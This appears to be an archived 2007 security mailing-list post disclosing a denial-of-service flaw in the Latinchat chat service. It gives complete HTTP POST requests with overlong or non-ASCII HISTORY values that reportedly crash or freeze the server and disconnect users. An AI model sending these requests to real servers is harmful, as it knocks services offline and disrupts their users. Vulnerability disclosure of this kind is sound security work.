Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [VulnWatch] Latinchat Denial Of Service

from [d4rksoft] Network Security [Permanent Link]
Subject: Re: [VulnWatch] Latinchat Denial Of Service
Date: Sat, 7 Apr 2007 23:47:58 -0700 (PDT) 

Today this vulnerability keeps on existing in latinchat but with certain
difference.Instead of request:
POST /JAVA HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
Referer: http://www.disp004-org.latinchat.com
Content-length: 142

UserName=mynick&SessionID=C17d808043&TEMPLATE=2&RoomID=R29_6-1&HISTORY=999999999999999999999999999999999999999999999999999999999999999999999

the user is sending other request using ASCII  characters, for example :

POST /JAVA HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
Referer: http://www.disp004-org.latinchat.com
Content-length: 142

UserName=mynick&SessionID=C17d808043&TEMPLATE=2&RoomID=R29_6-1&HISTORY=ÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂ

by sending this request to the server, it will crash.

Another request that freezes the server has following aspect:

POST /IN HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
Referer: http://www.disp004-org.latinchat.com
Content-length: 142

using this request  the attacker can boot  certain quantity of users at the
same time and the server remains frozen until the attacker does not stop
process of attack.And in this case it does not have a lot of importance that
we are going to put in variable of history
:HISTORY=ÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂÂÂÃÂ
or
HISTORY=999999999999999999999999999999999999999999999999999999999999999999999999999

the result will be the same

Researcher: Vitto Makarsky (d4rkv1rus)
-- 
View this message in context: 
http://www.nabble.com/Latinchat-Denial-Of-Service-tf2082367.html#a9890343
Sent from the Vulnerability - VulnWatch mailing list archive at Nabble.com.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Re: [VulnWatch] Latinchat Denial Of Service, d4rksoft <=
Previous by Date:  [Full-disclosure] iDefense Security Advisory 04.04.07: ESRI ArcSDE Buffer Overflow Vulnerability, iDefense Labs
Next by Date:  [Full-disclosure] iDefense Security Advisory 04.09.07: AOL AIM and ICQ File Transfer Path-Traversal Vulnerability, iDefense Labs
Previous by Thread:  [Full-disclosure] iDefense Security Advisory 04.04.07: ESRI ArcSDE Buffer Overflow Vulnerability, iDefense Labs
Next by Thread:  [Full-disclosure] iDefense Security Advisory 04.09.07: AOL AIM and ICQ File Transfer Path-Traversal Vulnerability, iDefense Labs
Indexes:  [Date] [Thread] [Top] [All Lists]